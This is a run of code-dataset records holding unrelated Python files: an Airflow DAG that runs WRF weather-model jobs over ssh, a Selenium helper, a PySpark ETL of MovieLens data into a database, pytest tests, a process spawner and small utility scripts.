calculate_wrf_rule_accuracy\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/weather_models/wrf')\nfrom model_definition import get_namelist_wps_config, get_namelist_input_config\n\nprod_dag_name = 'wrf_4.1.2_A_dag'\ndag_pool = 'wrf_pool'\n\ndefault_args = {\n 'owner': 'dss admin',\n 'start_date': datetime.utcnow(),\n 'email': ['hasithadkr7@gmail.com'],\n 'email_on_failure': True,\n}\n\nssh_cmd_template = \"ssh -i /home/curw/.ssh/curw -o \\\"StrictHostKeyChecking no\\\" curw@{} \" \\\n \"\\'bash -c \\\"{}\\\"'\"\n\n\ndef get_dss_db_adapter():\n adapter = None\n try:\n db_config = Variable.get('db_config', deserialize_json=True)\n try:\n adapter = RuleEngineAdapter.get_instance(db_config)\n except Exception as ex:\n print('get_dss_db_adapter|db_adapter|Exception: ', str(ex))\n except Exception as e:\n print('get_dss_db_adapter|db_config|Exception: ', str(e))\n return adapter\n\n\ndef get_push_command(**context):\n wrf_rule = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')\n print('get_wrf_run_command|wrf_rule : ', wrf_rule)\n wrf_model = wrf_rule['model']\n wrf_run = wrf_rule['rule_info']['run']\n gfs_hour = wrf_rule['rule_info']['hour']\n print('get_wrf_run_command|rule_details: ', wrf_rule['rule_info']['rule_details'])\n push_node = wrf_rule['rule_info']['rule_details']['push_node']\n bash_script = wrf_rule['rule_info']['rule_details']['push_script']\n push_config = wrf_rule['rule_info']['rule_details']['push_config']\n wrf_bucket = wrf_rule['rule_info']['rule_details']['wrf_bucket']\n exec_date = datetime.strptime(context[\"execution_date\"].to_datetime_string(), '%Y-%m-%d %H:%M:%S')\n exec_date = exec_date.strftime('%Y-%m-%d')\n push_script = '{} {} {} d{} {} {} {}'.format(bash_script, push_config, wrf_bucket, wrf_run,\n gfs_hour, wrf_model, exec_date)\n print('get_push_command|run_script : ', push_script)\n push_wrf4_A_cmd = ssh_cmd_template.format(push_node, push_script)\n print('get_push_command|push_wrf4_A_cmd : ', push_wrf4_A_cmd)\n subprocess.call(push_wrf4_A_cmd, shell=True)\n\n\ndef get_wrf_run_command(**context):\n wrf_rule = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')\n print('get_wrf_run_command|wrf_rule : ', wrf_rule)\n wrf_model = wrf_rule['model']\n wrf_version = wrf_rule['version']\n wrf_run = wrf_rule['rule_info']['run']\n gfs_hour = wrf_rule['rule_info']['hour']\n namelist_wps_id = wrf_rule['rule_info']['namelist_wps']\n namelist_input_id = wrf_rule['rule_info']['namelist_input']\n print('get_wrf_run_command|rule_details: ', wrf_rule['rule_info']['rule_details'])\n run_node = wrf_rule['rule_info']['rule_details']['run_node']\n run_script = wrf_rule['rule_info']['rule_details']['run_script']\n namelist_wps_template = wrf_rule['rule_info']['rule_details']['namelist_wps_template']\n namelist_input_template = wrf_rule['rule_info']['rule_details']['namelist_input_template']\n exec_date = context[\"execution_date\"].to_datetime_string()\n dss_adapter = get_dss_db_adapter()\n if dss_adapter is not None:\n wps_content = get_namelist_wps_config(dss_adapter, namelist_wps_id, namelist_wps_template)\n if wps_content is not None:\n zipped_wps_content = zlib.compress(wps_content.encode())\n input_content = get_namelist_input_config(dss_adapter, namelist_input_id, namelist_input_template)\n if input_content is not None:\n zipped_input_content = zlib.compress(input_content.encode())\n run_script = '{} -r {} -m {} -v {} -h {} -d {} -a {} -b {}'.format(run_script, wrf_run,\n wrf_model, wrf_version,\n gfs_hour, exec_date,\n zipped_wps_content,\n zipped_input_content)\n print('get_wrf_run_command|run_script : ', run_script)\n run_wrf4_A_cmd = ssh_cmd_template.format(run_node, run_script)\n print('get_wrf_run_command|run_wrf4_A_cmd : ', run_wrf4_A_cmd)\n subprocess.call(run_wrf4_A_cmd, shell=True)\n\n\ndef update_workflow_status(status, rule_id):\n try:\n db_config = Variable.get('db_config', deserialize_json=True)\n try:\n adapter = RuleEngineAdapter.get_instance(db_config)\n adapter.update_rule_status_by_id('wrf', rule_id, status)\n except Exception as ex:\n print('update_workflow_status|db_adapter|Exception: ', str(ex))\n except Exception as e:\n print('update_workflow_status|db_config|Exception: ', str(e))\n\n\ndef get_rule_id(context):\n rule_info = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')['rule_info']\n if rule_info:\n rule_id = rule_info['id']\n print('get_rule_id|rule_id : ', rule_id)\n return rule_id\n else:\n return None\n\n\ndef set_running_status(**context):\n rule_id = get_rule_id(context)\n print('set_running_status :', )\n if rule_id is not None:\n update_workflow_status(2, rule_id)\n else:\n print('set_running_status|rule_id not found')\n\n\ndef set_complete_status(**context):\n rule_id = get_rule_id(context)\n if rule_id is not None:\n update_workflow_status(3, rule_id)\n else:\n print('set_complete_status|rule_id not found')\n\n\ndef run_this_func(dag_run, **kwargs):\n print('run_this_func|dag_run : ', dag_run)\n wrf_rule = {'model': 'A', 'version': '4.1.2', 'rule_info': dag_run.conf}\n print('run_this_func|wrf_rule : ', wrf_rule)\n return wrf_rule\n\n\ndef check_accuracy(**context):\n print('check_accuracy|context : ', context)\n task_info = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')\n print('check_accuracy|task_info : ', task_info)\n rule_info = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')['rule_info']\n print('check_accuracy|rule_info : ', rule_info)\n accuracy_rule_id = rule_info['accuracy_rule']\n if accuracy_rule_id == 0 or accuracy_rule_id == '0':\n return True\n else:\n wrf_rule = {'model': 'A', 'version': '4.1.2', 'rule_info': rule_info}\n print('check_accuracy|wrf_rule : ', wrf_rule)\n exec_date = context[\"execution_date\"].to_datetime_string()\n print('check_accuracy|exec_date : ', wrf_rule)\n return calculate_wrf_rule_accuracy(wrf_rule, exec_date)\n\n\ndef on_dag_failure(context):\n rule_id = get_rule_id(context)\n if rule_id is not None:\n update_workflow_status(4, rule_id)\n print('on_dag_failure|set error status for rule|rule_id :', rule_id)\n else:\n print('on_dag_failure|rule_id not found')\n\n\nwith DAG(dag_id=prod_dag_name, default_args=default_args, schedule_interval=None,\n description='Run WRF v4 A DAG', dagrun_timeout=timedelta(hours=9), catchup=False,\n on_failure_callback=on_dag_failure, max_active_runs=2, concurrency=2) as dag:\n init_wrfv4_A = PythonOperator(\n task_id='init_wrfv4A',\n provide_context=True,\n python_callable=run_this_func,\n pool=dag_pool\n )\n\n running_state_wrfv4A = PythonOperator(\n task_id='running_state_wrfv4A',\n provide_context=True,\n python_callable=set_running_status,\n pool=dag_pool\n )\n\n check_gfs_availability_wrfv4A = GfsSensorOperator(\n task_id='check_gfs_availability_wrfv4A',\n poke_interval=60,\n execution_timeout=timedelta(minutes=45),\n params={'model': 'A', 'init_task_id': 'init_wrfv4A'},\n provide_context=True,\n pool=dag_pool\n )\n\n run_wrf4_A = PythonOperator(\n task_id='run_wrf4_A',\n provide_context=True,\n execution_timeout=timedelta(hours=8, minutes=30),\n python_callable=get_wrf_run_command,\n pool=dag_pool\n )\n\n wrf_data_push_wrfv4A = PythonOperator(\n task_id='wrf_data_push_wrfv4A',\n provide_context=True,\n python_callable=get_push_command,\n pool=dag_pool\n )\n\n check_accuracy_wrfv4A = PythonOperator(\n task_id='check_accuracy_wrfv4A',\n provide_context=True,\n python_callable=check_accuracy,\n pool=dag_pool\n )\n\n complete_state_wrfv4A = PythonOperator(\n task_id='complete_state_wrfv4A',\n provide_context=True,\n python_callable=set_complete_status,\n pool=dag_pool\n )\n\n init_wrfv4_A >> running_state_wrfv4A >> check_gfs_availability_wrfv4A >> \\\n run_wrf4_A >> wrf_data_push_wrfv4A >> check_accuracy_wrfv4A >> complete_state_wrfv4A\n","sub_path":"local_dss_workflow/dags/wrf/wrf_4.1.2_A.py","file_name":"wrf_4.1.2_A.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"343011237","text":"import datetime\nimport shutil\nimport os\n# import automagica.activities as all_method\nimport sys\nimport time\nimport base64\nsys.path.append('..')\nsys.path.append('.')\nsys.path.append('../')\nsys.path.append('..')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\noptions = webdriver.ChromeOptions()\nchrome_options = options\noptions.add_experimental_option('excludeSwitches', ['enable-automation'])\ndic_for_window ={}\nimport pickle\n\nfrom env_variable import *\nimport binascii\nimport io\n\n'''\n这个代码使用非常复杂所以写一些demo提供参考:\n-p id \\\"sb_form_q\\\" send_keys(\\\"abc\\\")\n-p id \\\"sb_form_q\\\" get_attribute(\\\"id\\\")\n-p id \\\"sb_form_q\\\" get_property(\\\"id\\\")\n-p id \\\"sb_form_q\\\" text\n'''\ntry:\n\n import argparse\n# 调用demo: 第一个参数: xpath|class_name|link_text|partial_link_text|name|tag_name|id|css_selector\n # 第二个参数 \"aaa\" #表示第一个参数的值 ===========\n # 第三个参数 'send_keys(\\\"abc\\\")'|click()|get_attribute(\"id\")\n # id \\\"sb_form_q\\\" end_keys(\\\"abc\\\")\n parser = argparse.ArgumentParser()\n parser.add_argument( \"-p\", type=str,nargs='+')\n args = parser.parse_args()\n if not args.p:\n args.p=\"f\"\n # print(args.url)\n # print(11111111)\n\n # \"dic_for_window[{}]={}\\n\".format(\"browser.title\", \"browser.current_window_handle\"),\n # browser='''\n # aaaaaaaaaaaaaaaio.BytesIO\n\n def create_driver():\n driver = webdriver.Chrome(options=chrome_options)\n with open(session_file, 'wb') as f:\n params = {\"session_id\": driver.session_id, \"server_url\": driver.command_executor._url}\n pickle.dump(params, f)\n driver.get(args.url)\n return driver\n\n#==============================下面是chrome每一个的逻辑部分.\n if not os.path.exists(session_file):\n raise 1\n else:\n with open(session_file, 'rb') as f:\n params = pickle.load(f)\n try:\n options = webdriver.ChromeOptions()\n options.add_argument(\"headless\")\n driver = webdriver.Remote(command_executor=params[\"server_url\"],options=options)\n driver.quit() # 退出start_session新开的空白浏览器\n driver.session_id = params[\"session_id\"]\n # driver.execute_script('window.open(\"\");')\n # driver.get(args.url)\n\n#================处理代码写这个地方.\n act=args.p\n aaa='driver.find_element_by_'+act[0]+\"(\"+act[1]+\")\"+'.'+act[2]\n data=eval('driver.find_element_by_'+act[0]+\"(\"+act[1]+\")\"+'.'+act[2])\n # driver.switch_to.active_element.send_keys(args.p)\n # driver.close()\n # driver.switch_to.window(driver.window_handles[-1])\n except:\n raise\n if data:\n import json\n a=json.dumps({'code':0,\"msg\":data},ensure_ascii=False)\n else:\n import json\n a=json.dumps({'code':0,\"msg\":'success'},ensure_ascii=False)\n\n print(a)\n\n\n\n\n\nexcept:\n print(\"{'code':'1','msg':'fault'}\")\n\n","sub_path":"yolov4_newest_custom_data/browser_find_element_and_do_something.py","file_name":"browser_find_element_and_do_something.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"335486952","text":"import webbrowser\n\n\nclass Movie(): # Here class is created\n \"\"\"This code is helping us to create movie website\"\"\" # this is doc\n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"] # class variables\n\n def __init__(self, movie_title, movie_storyline, image, trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline # this are instance variables\n self.poster_image_url = image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n webbrowser.open(self.trailer_youtube_url) # open link in browser\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"6945038","text":"from pyspark.sql import SparkSession\r\nfrom pyspark.sql import functions as func\r\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType, LongType\r\nfrom pyspark.sql.window import *\r\nimport argparse\r\n\r\n\r\n\r\nspark = SparkSession.builder.appName(\"ml-100k\").getOrCreate()\r\n\r\nocupaschema = StructType([StructField(\"Occupation\", StringType(),True)])\r\n\r\ngenreschema = StructType([\\\r\n StructField(\"Genre\", StringType(),True), \\\r\n])\r\n\r\nuserschema = StructType([\\\r\n StructField(\"id\", IntegerType(), True), \\\r\n StructField(\"Age\", IntegerType(), True), \\\r\n StructField(\"Gender\", StringType(), True), \\\r\n StructField(\"Occupation\", StringType(), True),\\\r\n StructField(\"Zipcode\", StringType(), True)])\r\n\r\nitenschema = StructType([\\\r\n StructField(\"id\", IntegerType(), True), \\\r\n StructField(\"Name\", StringType(), True), \\\r\n StructField(\"Date\", StringType(), True), \\\r\n StructField(\"Null\", StringType(), True), \\\r\n StructField(\"Link\", StringType(), True),\\\r\n StructField(\"unknown\", IntegerType(), True), \\\r\n StructField(\"Action\", IntegerType(), True), \\\r\n StructField(\"Adventure\", IntegerType(), True), \\\r\n StructField(\"Animation\", IntegerType(), True), \\\r\n StructField(\"Childrens\", IntegerType(), True), \\\r\n StructField(\"Comedy\", IntegerType(), True), \\\r\n StructField(\"Crime\", IntegerType(), True), \\\r\n StructField(\"Documentary\", IntegerType(), True), \\\r\n StructField(\"Drama\", IntegerType(), True), \\\r\n StructField(\"Fantasy\", IntegerType(), True), \\\r\n StructField(\"FilmNoir\", IntegerType(), True), \\\r\n StructField(\"Horror\", IntegerType(), True), \\\r\n StructField(\"Musical\", IntegerType(), True), \\\r\n StructField(\"Mystery\", IntegerType(), True), \\\r\n StructField(\"Romance\", IntegerType(), True), \\\r\n StructField(\"SciFi\", IntegerType(), True), \\\r\n StructField(\"Thriller\", IntegerType(), True), \\\r\n StructField(\"War\", IntegerType(), True), \\\r\n StructField(\"Western\", IntegerType(), True)])\r\n\r\nmoviexgenreschema = StructType([\\\r\n StructField(\"Movie_id\", IntegerType(), True), \\\r\n StructField(\"Genre_id\", IntegerType(), True)\r\n])\r\n\r\nscoreschema = StructType([\\\r\n StructField(\"User_id\", IntegerType(), True), \\\r\n StructField(\"Movie_id\", IntegerType(), True), \\\r\n StructField(\"Rating\", IntegerType(), True), \\\r\n StructField(\"Timestamp\", LongType(), True)\r\n])\r\n\r\n\r\n\r\noccupation = spark.read.schema(ocupaschema).csv(\"file:///ml-100k/u.occupation\")\r\n\r\nGenre = spark.read.option(\"sep\",\"|\").schema(genreschema).csv(\"file:///ml-100k/u.genre\")\r\n\r\nuser = spark.read.option(\"sep\",\"|\").schema(userschema).csv(\"file:///ml-100k/u.user\")\r\n\r\nscore = spark.read.option(\"sep\", \"\\t\").schema(scoreschema).csv(\"file:///ml-100k/u.data\")\r\n\r\nitens = spark.read\\\r\n .option(\"sep\",\"|\")\\\r\n .option(\"charset\", \"ISO-8859-1\")\\\r\n .schema(itenschema).csv(\"file:///ml-100k/u.item\")\r\n\r\n#code that allow arguments to be passed when calling the script, they are used to access the database in which the data is going to be written in\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--url')\r\nparser.add_argument('--schema')\r\nparser.add_argument('--user')\r\nparser.add_argument('--password')\r\nargs = parser.parse_args()\r\n\r\n#uses the window module to create the colum id of the occupation table\r\nwindow = Window.orderBy(func.col(\"Occupation\"))\r\noccupation = occupation.withColumn('id', func.row_number().over(window))\r\n\r\n#uses the window module to create the colum id of the movie genre table\r\nwindow = Window.orderBy(func.col(\"Genre\"))\r\nGenre = Genre.withColumn('id', func.row_number().over(window))\r\n\r\n#create an alias to both dataframes, this will be usefull when whe join both and want to rename the id table that got joined\r\nuser = user.alias('user')\r\noccupation = occupation.alias('occupation')\r\n#the actual join code\r\nuser = user.join(occupation, on= 'occupation', how='left')\r\n#drop the occupation table as this is not useful here\r\nuser = user.drop('Occupation')\r\n#this select is used to rename the id that got joined from the occupation table, here is where the alias given to the dataframes are used\r\nuser = user.select(\r\n func.col(\"user.id\"),\r\n func.col(\"user.Age\"),\r\n func.col(\"user.Gender\"),\r\n func.col(\"user.Zipcode\"),\r\n func.col(\"occupation.id\").alias(\"Occupation_id\")\r\n)\r\n#uses a regular expression to replace the releases date that was in the movie name colum with an empty space\r\nitens = itens.withColumn('Name', func.regexp_replace(func.col(\"Name\"), r\"\\((\\d+[^()]+)\\)\", ''))\r\n\r\n\r\n\r\n#code that creates a dictionary for each movie id and its respective genres, the !=0 is used because the entrys that were not in the genre would be added to dictionary because of how the genre are stored in the original file\r\nditcAc = {row['id']:row['Action'] for row in itens.collect() if row['Action'] != 0}\r\nditcAd = {row['id']:row['Adventure'] for row in itens.collect() if row['Adventure'] != 0}\r\nditcAn = {row['id']:row['Animation'] for row in itens.collect() if row['Animation'] != 0}\r\nditcCh = {row['id']:row['Childrens'] for row in itens.collect() if row['Childrens'] != 0}\r\nditcCo = {row['id']:row['Comedy'] for row in itens.collect() if row['Comedy'] != 0}\r\nditcCr = {row['id']:row['Crime'] for row in itens.collect() if row['Crime'] != 0}\r\nditcDo = {row['id']:row['Documentary'] for row in itens.collect() if row['Documentary'] != 0}\r\nditcDr = {row['id']:row['Drama'] for row in itens.collect() if row['Drama'] != 0}\r\nditcFa = {row['id']:row['Fantasy'] for row in itens.collect() if row['Fantasy'] != 0}\r\nditcFi = {row['id']:row['FilmNoir'] for row in itens.collect() if row['FilmNoir'] != 0}\r\nditcHo = {row['id']:row['Horror'] for row in itens.collect() if row['Horror'] != 0}\r\nditcMu = {row['id']:row['Musical'] for row in itens.collect() if row['Musical'] != 0}\r\nditcMy = {row['id']:row['Mystery'] for row in itens.collect() if row['Mystery'] != 0}\r\nditcRo = {row['id']:row['Romance'] for row in itens.collect() if row['Romance'] != 0}\r\nditcSc = {row['id']:row['SciFi'] for row in itens.collect() if row['SciFi'] != 0}\r\nditcTh = {row['id']:row['Thriller'] for row in itens.collect() if row['Thriller'] != 0}\r\nditcWa = {row['id']:row['War'] for row in itens.collect() if row['War'] != 0}\r\nditcWe = {row['id']:row['Western'] for row in itens.collect() if row['Western'] != 0}\r\nditcUn = {row['id']:row['unknown'] for row in itens.collect() if row['unknown'] != 0}\r\n\r\n#replace the value of dictionary (which at this moment is 1) to the same as its id counterpart in the genre table!\r\nditcAc = {x: 1 for x in ditcAc}\r\nditcAd = {x: 2 for x in ditcAd}\r\nditcAn = {x: 3 for x in ditcAn}\r\nditcCh = {x: 4 for x in ditcCh}\r\nditcCo = {x: 5 for x in ditcCo}\r\nditcCr = {x: 6 for x in ditcCr}\r\nditcDo = {x: 7 for x in ditcDo}\r\nditcDr = {x: 8 for x in ditcDr}\r\nditcFa = {x: 9 for x in ditcFa}\r\nditcFi = {x: 10 for x in ditcFi}\r\nditcHo = {x: 11 for x in ditcHo}\r\nditcMu = {x: 12 for x in ditcMu}\r\nditcMy = {x: 13 for x in ditcMy}\r\nditcRo = {x: 14 for x in ditcRo}\r\nditcSc = {x: 15 for x in ditcSc}\r\nditcTh = {x: 16 for x in ditcTh}\r\nditcWa = {x: 17 for x in ditcWa}\r\nditcWe = {x: 18 for x in ditcWe}\r\nditcUn = {x: 19 for x in ditcUn}\r\n\r\n#creats a list using the dictionary created, thoses lists will be merged toghter to be used in the creation of the dataframe containing the genres that the movies are in\r\nliUn = list(ditcUn.items())\r\nliAc = list(ditcAc.items())\r\nliAd = list(ditcAd.items())\r\nliAn = list(ditcAn.items())\r\nliCh = list(ditcCh.items())\r\nliCr = list(ditcCr.items())\r\nliDo = list(ditcDo.items())\r\nliDr = list(ditcDr.items())\r\nliFa = list(ditcFa.items())\r\nliFi = list(ditcFi.items())\r\nliHo = list(ditcHo.items())\r\nliMu = list(ditcMu.items())\r\nliMy = list(ditcMy.items())\r\nliRo = list(ditcRo.items())\r\nliSc = list(ditcSc.items())\r\nliTh = list(ditcTh.items())\r\nliWa = list(ditcWa.items())\r\nliWe = list(ditcWe.items())\r\n\r\n#the code that merges the lists\r\nlisttodf = liUn + liAc + liAd + liAn + liCh + liCr + liDo + liDr + liFa + liFi + liHo + liMu + liMy + liRo + liSc + liTh + liWa + liWe\r\n#creates the dataframe using the finalized list and uses the 'moviexgenreschema' schema\r\nmoviexgenre = spark.createDataFrame(data =listtodf, schema = moviexgenreschema)\r\n# a simple window function to give the entrys its respective id\r\nwindow = Window.orderBy(func.col(\"Movie_id\"))\r\nmoviexgenre = moviexgenre.withColumn('id', func.row_number().over(window))\r\n\r\n#puts the id as the first item in the dataframe\r\nmoviexgenre = moviexgenre.select(\r\n func.col(\"id\"),\r\n func.col(\"Movie_id\"),\r\n func.col(\"Genre_id\")\r\n)\r\n#creates the movie dataframe from the itens dataframe. that dataframe contained a lot of data that is not used in the soon to be movie table so whe use a select to just add the data whe need\r\nmovie = itens.select(\r\n func.col(\"id\"),\r\n func.col(\"Name\"),\r\n func.col(\"Date\"),\r\n func.col(\"Link\").alias(\"IMDB_Url\")\r\n)\r\n# a simple window function to give the entrys its respective id\r\nwindow = Window.orderBy(func.col(\"timestamp\"))\r\nscore = score.withColumn('id', func.row_number().over(window))\r\n\r\n#this select is used to convert the timestamp colum who originaly is on unix time to timestamp type\r\nscore = score.select(\r\n func.col(\"id\"),\r\n func.col(\"User_id\"),\r\n func.col(\"Movie_id\"),\r\n func.col(\"Rating\"),\r\n func.from_unixtime(func.col(\"timestamp\")).alias(\"Timestamp\")\r\n)\r\n#JDBC code to write on the database\r\n# the URL, SCHEMA, USER and PASSWORD are setted by passing them as arguments when calling the script.\r\n#Example: spark-submit --driver-class-path C:\\ml100k\\postgresql-42.2.23.jar project.py --url jdbc:postgresql://localhost:5432/postgres --schema ml100k --user postgres --password admin\r\noccupation.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Occupation') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nGenre.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Genre') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nuser.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.User') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nmovie.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Movie') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nmoviexgenre.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.MoviexGenre') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nscore.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Score') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n","sub_path":"ml100k.py","file_name":"ml100k.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"314082519","text":"from unittest.mock import sentinel\n\nimport pytest\n\nfrom via.views.proxy import proxy\n\n\nclass TestProxy:\n @pytest.mark.parametrize(\n \"path,url_to_proxy\",\n [\n (\"/https://example.com/foo\", \"https://example.com/foo\"),\n (\"/http://example.com/foo\", \"http://example.com/foo\"),\n (\n \"/https://example.com/foo?bar=gar&har=jar#car\",\n \"https://example.com/foo?bar=gar&har=jar#car\",\n ),\n ],\n )\n def test_it(\n self, pyramid_request, path, url_to_proxy, get_url_details, via_client_service\n ):\n pyramid_request.path = path\n\n result = proxy(pyramid_request)\n\n get_url_details.assert_called_once_with(url_to_proxy)\n via_client_service.url_for.assert_called_once_with(\n url_to_proxy, sentinel.mime_type, pyramid_request.params\n )\n assert result == {\"src\": via_client_service.url_for.return_value}\n\n def test_it_normalizes_url(\n self, pyramid_request, get_url_details, via_client_service, url_from_user_input\n ):\n pyramid_request.path = \"/https://example.org\"\n url_from_user_input.side_effect = [\"https://normalized.com\"]\n\n proxy(pyramid_request)\n\n url_from_user_input.assert_called_with(\"https://example.org\")\n get_url_details.assert_called_once_with(\"https://normalized.com\")\n via_client_service.url_for.assert_called_once_with(\n \"https://normalized.com\", sentinel.mime_type, pyramid_request.params\n )\n\n @pytest.fixture(autouse=True)\n def get_url_details(self, patch):\n get_url_details = patch(\"via.views.proxy.get_url_details\")\n get_url_details.return_value = (sentinel.mime_type, sentinel.status_code)\n return get_url_details\n\n @pytest.fixture(autouse=True)\n def url_from_user_input(self, patch):\n url_from_user_input = patch(\"via.views.proxy.url_from_user_input\")\n url_from_user_input.side_effect = lambda url: url\n return url_from_user_input\n","sub_path":"tests/unit/via/views/proxy_test.py","file_name":"proxy_test.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184355615","text":"import subprocess as sp\nimport sys\nimport os\n\nfrom .bots import types\n\n\nclass Spawner:\n @staticmethod\n def spawn(types_to_spawn=types.ALL_QUERIES) -> '_RabbitConsumer':\n pids = []\n for t in types_to_spawn:\n pids.append(Spawner._start_subprocess(t))\n\n return pids\n\n @staticmethod\n def _start_subprocess(t):\n # Start consumer, pass type as parameter\n p = sp.Popen(\n ['python', '-m', 'bots.consumers', '-t', t],\n cwd=os.path.dirname(os.path.abspath(__file__)),\n stderr=sp.STDOUT,\n )\n\n # Display (or log?) PID for future kill\n print('Started consumer of type', t, 'with PID', p.pid)\n\n return p.pid\n\n\nif __name__ == '__main__':\n Spawner.spawn()\n\n # Ensure immediate smooth exit\n sys.exit(0)\n","sub_path":"query/spawner.py","file_name":"spawner.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"127712342","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/6/25 18:02\n# @Author : Greens\n\n\n\"\"\"\n给你一根长度为n的绳子,请把绳子剪成整数长的m段(m、n都是整数,n>1并且m>1),\n每段绳子的长度记为k[1],...,k[m]。请问k[1]x...xk[m]可能的最大乘积是多少?\n例如,当绳子的长度是8时,我们把它剪成长度分别为2、3、3的三段,此时得到的最大乘积是18\n\"\"\"\n\n\nclass Solution:\n def cutRope(self, number):\n dp = [0 for _ in range(number + 1)]\n dp[1] = 1\n dp[2] = 1\n for i in range(3, number + 1):\n for j in range(2, i):\n dp[i] = max(dp[i], max(j * (i - j), j * dp[i - j]))\n print(dp)\n return dp[number]\n\n\nif __name__ == '__main__':\n my_class = Solution()\n my_class.cutRope(9)\n","sub_path":"code/2020_06/剪绳子.py","file_name":"剪绳子.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"628282782","text":"from vmwaremirage import VmwareMirageClient\nimport config\nimport config_secure\nimport os\n\n\nvm = VmwareMirageClient(server=config_secure.server,\n username=config_secure.username,\n password=os.environ['VMWARE_MIRAGE_PASSWORD'])\n\n\ndef test_reauth():\n # Cofirm we are working\n cvd = vm.get_cvd(config.cvd_1['id'])\n assert cvd.Name == config.cvd_1['name']\n\n # Logout\n vm.client.service.Logout()\n\n # And try again. It should automatically re-authenticate\n cvd = vm.get_cvd(config.cvd_1['id'])\n assert cvd.Name == config.cvd_1['name']\n\n\ndef test_get_cvds():\n # Test the by id function\n cvd = vm.get_cvd(config.cvd_1['id'])\n assert cvd.Name == config.cvd_1['name']\n\n # Test getting two cvds by id\n cvds = vm.get_cvds(by='ID', value=[config.cvd_1['id'],config.cvd_2['id']], query_type='EQUALS')\n assert len(cvds) == 2\n\n cvds = vm.get_cvds(by='DEVICE_ID', value=[config.cvd_1['deviceid'],config.cvd_2['deviceid']], query_type='EQUALS')\n assert len(cvds) == 2\n\n cvds = vm.get_cvds(by='POLICY_ID', value=config.cvd_1['policyid'], query_type='EQUALS')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='NAME', value=config.cvd_1['name'])\n assert len(cvds) == 1\n\n cvds = vm.get_cvds(by='USER_NAME', value=config.cvd_1['username'], query_type='CONTAINS')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='POLICY_NAME', value=config.cvd_1['policyname'], query_type='ENDS_WITH')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='CONNECTION_STATE', value=False, query_type='EQUALS')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='CLIENT_STATUS', value='Idle', query_type='EQUALS')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='PROGRESS', value=100, query_type='NOT_EQUALS')\n assert len(cvds) >= 1\n\n\ndef test_get_collection_cvds():\n cvds = vm.get_collection_cvds(config.collection['id'])\n assert len(cvds) >= 1\n\n\ndef test_get_app_layers():\n layers = vm.get_app_layers()\n assert len(layers) >= 1\n\n layer = vm.get_app_layers(by='ID', value=config.app_layer['id'], query_type='EQUALS')[0]\n assert layer.Name == config.app_layer['name']\n\n layers = vm.get_app_layers(by='NAME', value=config.app_layer['name'])\n assert len(layers) >= 1\n\n\ndef test_get_base_layers():\n layers = vm.get_base_layers()\n assert len(layers) >= 1\n\n layer = vm.get_base_layers(by='ID', value=config.base_layer['id'], query_type='EQUALS')[0]\n assert layer.Name == config.base_layer['name']\n\n layers = vm.get_base_layers(by='NAME', value=config.base_layer['name'])\n assert len(layers) >= 1\n\n\ndef test_get_collections():\n colls = vm.get_collections(by='ID', value=config.collection['id'], 